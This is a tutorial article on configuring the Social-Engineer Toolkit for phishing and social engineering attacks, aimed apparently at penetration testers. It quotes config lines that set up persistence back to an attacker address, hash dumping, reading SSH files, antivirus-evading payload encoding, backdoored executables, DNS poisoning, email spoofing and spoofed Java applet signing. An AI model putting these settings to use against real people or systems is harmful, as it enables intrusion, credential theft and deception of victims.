This is the second part of the phishing and social engineering techniques series. In the first article, we have discussed what phishing is, as well as different types of phishing. We made a demo of a phishing attack using an email spoofing method to convince our victims to click on our links, and finally we had an overview about the Social Engineering Toolkit.
Today we are going to talk in detail about the social engineering toolkit configuration, which allows us to customize our configuration according to the attack scenario. So being familiar with the configuration options will give you a view about the full features of SET to use these features to launch attack against our victims to convince them to provide the attacker all information that the attacker needs for further attack.
What is social engineering? According to Wikipedia:
Social engineering, in the context of security, is understood to mean the art of manipulating people into performing actions or divulging confidential information. This is a type of confidence trick for the purpose of information gathering, fraud, or computer system access. It differs from traditional cons in that often the attack is often a mere step in a more complex fraud.
The Social-Engineer (SET) was created and written by David Kennedy (ReL1K) and is an open-source python-driven tool that focuses solely on attacking the weakest link in the information security chain —the human element. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.
The Social-Engineer Toolkit(SET) is included in the latest version of the most popular Linux distribution focused on security— BackTrack. It can also be downloaded through GitHub using the following command:
Social Engineering Toolkit Update
The first step that we should take after installing BackTrack is updating the Social Engineering Toolkit. To do so, open the terminal and change directory to the SET directory, then enter the following command:
root@bt:/pentest/exploits/set# svn update D config/set_config.py U config/set_config U config/update_config.py U setup.py A src/fasttrack/delldrac.py U src/fasttrack/mssql.py U src/powershell/powershell.py U src/core/set.py U src/core/payloadgen/create_payloads.py U src/core/setcore.py U src/core/dictionaries.py U src/core/menu/text.py U src/core/fasttrack.py U src/html/spawn.py U src/html/Signed_Update.jar.orig U src/html/unsigned/verified_sign.py U src/html/unsigned/unsigned.jar D src/webattack/java_applet U src/webattack/multi_attack/multiattack.py U src/webattack/harvester/scraper.py U src/webattack/harvester/harvester.py U src/webattack/browser_exploits/gen_payload.py D src/webattack/web_clone/linux D src/webattack/web_clone/osx A src/webattack/web_clone/applet.txt A src/webattack/web_clone/applet.database.old U src/webattack/web_clone/applet.database U src/payloads/set_payloads/shell.windows A src/payloads/set_payloads/pyinjector.binary U src/payloads/set_payloads/listener.py U set U readme/CHANGES U readme/CREDITS U readme/README Updated to revision 1599.
Social Engineering Toolkit configuration
The power of SET is in its configuration file. SET using its default settings works perfectly for most users, but advanced customization will help us to make sure that the attack vectors run without problems. So after updating SET, it’s time to edit the SET configuration file. So let’s walk through it.
To open SET configuration file, Open the terminal and change the directory to config folder under the SET directory, you will find the configuration file called set_config. Open it in any text editor.
### Define the path to MetaSploit, for example: /pentest/exploits/framework3 METASPLOIT_PATH=/opt/metasploit/msf3
While looking through the configuration file, you can change any option to get the desired result. In the first option, you can change the path of where Metasploit is located. SET uses Metasploit for the payload creations, file format bugs, and for the browser exploit scenarios. By default, the Metasploit location is /opt/metasploit/msf3.
### This will tell what database to use when using the MetaSploit functionality. Default is PostgreSQL METASPLOIT_DATABASE=postgresql
In this option, you can choose which database Metasploit will use. By default, PostgresSQL is the default database.
### How many times SET should encode a payload if you are using standard MetaSploit encoding options ENCOUNT=4
In this option, you can specify how many times Metasploit should encode the payload using the standard Metasploit encoding option. By default, it encodes four times before sending the payload.
### The browser, however can introduce buggy results when auto migrating. ### NOTE: This will make bypassuac not work properly. Migrate to a different process to get it to work. AUTO_MIGRATE=OFF
In this option, you can set auto_migrate option to on/off. ON means that the Meterpreter session will migrate to a different process. For example, if we got a Meterpreter session through a browser attack and the victim closed the browser, then the session will be dead. But if auto_migrate set to ON, the Meterpreter session will migrate to another running process so if the attacker closes the browser, the session is still live.
### Custom exe you want to use for Metasploit encoding, this usually has better av ### detection. Currently it is set to legit.binary which is just calc.exe. An example ### you could use would be putty.exe so this field would be /pathtoexe/putty.exe CUSTOM_EXE=legit.binary
In this option, you can determine which executable will be used for Metasploit encoding. By default, it’s set to legit.binary, which is calc.exe.
### This is for the backdoored executable if you want to keep the executable to still work. Normally ### when legit.binary is used, it will render the application useless. Specifying this will keep the ### application working BACKDOOR_EXECUTION=ON
In the next option we will determine if we want to keep the executable working. We specify this at custom_exe, which by default is calc.exe.
### Here we can run multiple Meterpreter scripts once a session is active. This ### may be important if we are sleeping and need to run persistence, try to elevate ### permissions and other tasks in an automated fashion. First turn this trigger on ### then configure the flags. Note that you need to separate the commands by a ; METERPRETER_MULTI_SCRIPT=OFF LINUX_METERPRETER_MULTI_SCRIPT=OFF
Here, we can run multiple Meterpreter scripts once a session is active. We can turn it off/on in the next option and specify these scripts.
### What commands do you want to run once a Meterpreter session has been established. ### Be sure if you want multiple commands to separate with a ;. For example you could do ### run getsystem;run hashdump;run persistence to run three different commands METERPRETER_MULTI_COMMANDS=run persistence -r 192.168.1.5 -p 21 -i 300 -X -A;getsystem LINUX_METERPRETER_MULTI_COMMANDS=uname;id;cat ~/.ssh/known_hosts
In this option, we can choose which commands will be run once a Meterpreter session has been established. If you want multiple commands, you can separate them with a semicolon “;”.
### This is the port that is used for the iFrame injection using the Metasploit browser attacks. ### By default this port is 8080 however egress filtering may block this. May want to adjust to ### something like 21 or 53 METASPLOIT_IFRAME_PORT=8080
You can use this to determine which port will be used for the iFrame injection while using the Metasploit browser attacks. By default, it will use port 8080. It’s better to change it to a popular port like 2153, etc.
### Define to use Ettercap or not when using website attack only - set to ON and OFF ETTERCAP=OFF ### Ettercap home directory (needed for DNS_spoof) ETTERCAP_PATH=/usr/share/ettercap ### Specify what interface you want ettercap or DSNiff to listen on, if nothing will default ETTERCAP_INTERFACE=eth0
Ettercap is a free and open source network security tool for man in the middle attacks on a LAN. It can be used for computer network protocol analysis and security auditing. It runs on various Unix-like operating systems including Linux, Mac OS X, BSD and Solaris, and on Microsoft Windows. It is capable of intercepting traffic on a network segment, capturing passwords, and conducting active eavesdropping against a number of common protocols.
The Ettercap options can be used when an attacker is on the same subnet as his victims and he wants to perform DNS poison attacks against a subset of IP addresses. When this flag is set to ON, it will poison the entire local subnet and redirect a specific site or all sites to your malicious server. There are three options for Ettercap. The first is used to allow SET to use Ettercap, and the second sets the path, and the third is to identify the interface on which Ettercap will listen.
### Define to use dsniff or not when using website attack only - set to on and off ### If dsniff is set to on, ettercap will automatically be disabled. DSNIFF=OFF
Dsniff is a set of password sniffing and network traffic analysis tools written by security researcher and startup founder Dug Song to parse different application protocols and extract relevant information. Dsniff passively monitors a network for interesting data (passwords, e-mail, files, etc.) In this option, you can allow the use of dsniff by setting it On/Off but take in your mind that Ettercap will automatically be disabled.
### SendMail ON or OFF for spoofing email addresses SENDMAIL=OFF
Sendmail is a general purpose internetwork email routing facility that supports many kinds of mail-transfer and -delivery methods, including the Simple Mail Transfer Protocol (SMTP) used for email transport over the Internet.
By setting sendmail flag to ON, Sendmail can spoof source email addresses. Sendmail must be installed before set it to ON. It’s installed by default in back track 5.
### Create self-signed Java applets and spoof publisher note this requires you to ### install ---> Java 6 JDK, BT5 or Ubuntu users: apt-get install openjdk-6-jdk ### If this is not installed it will not work. Can also do: apt-get install sun-java6-jdk SELF_SIGNED_APPLET=OFF
If we set this option to ON, It will allow us to sign the java applet with whatever the name that we want. For example, if we are targeting a company called “XYZ”, you can sign the java applet with “XYZ” to make it look more believable. By default the java applet is signed by Microsoft this will require you to install java’s jdk.
### Use Apache instead of the standard Python web server. This will increase the speed ### of the attack vector. APACHE_SERVER=OFF ### Path to the Apache web root APACHE_DIRECTORY=/var/www
If we set this option to ON, SET will use the Apache web server to handle the web requests because it will increase the speed of the attack. By default SET will use Python web server and you should set the Apache root directory —which is /var/www by default.
# TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR WEBATTACK_SSL=OFF # PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED) # YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT # IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED! SELF_SIGNED_CERT=OFF # BELOW IS THE CLIENT/SERVER (PRIVATE) CERT, THIS MUST BE IN PEM FORMAT IN ORDER TO WORK # SIMPLY PLACE THE PATH YOU WANT FOR EXAMPLE /root/ssl_client/server.pem PEM_CLIENT=/root/newcert.pem PEM_SERVER=/root/newreq.pem
If you are targeting a website that uses “HTTPS” protocol for communication, it’s better to make your website use “HTTPS” too, Fortunately SET allows you to incorporate SSL based attacks with it so you will need to turn the webattack_ssl to ON. And set the second option to ON if you want to use self-signed certificates and the third and fourth options should refer to the location of the client and server certificates.
The Social Engineering Toolkit is a powerful tool that allows the penetration tester to use against his victims to convince his victims to provide him with the required information for further attack. SET has many features that you can customize to help you to for your attack scenario.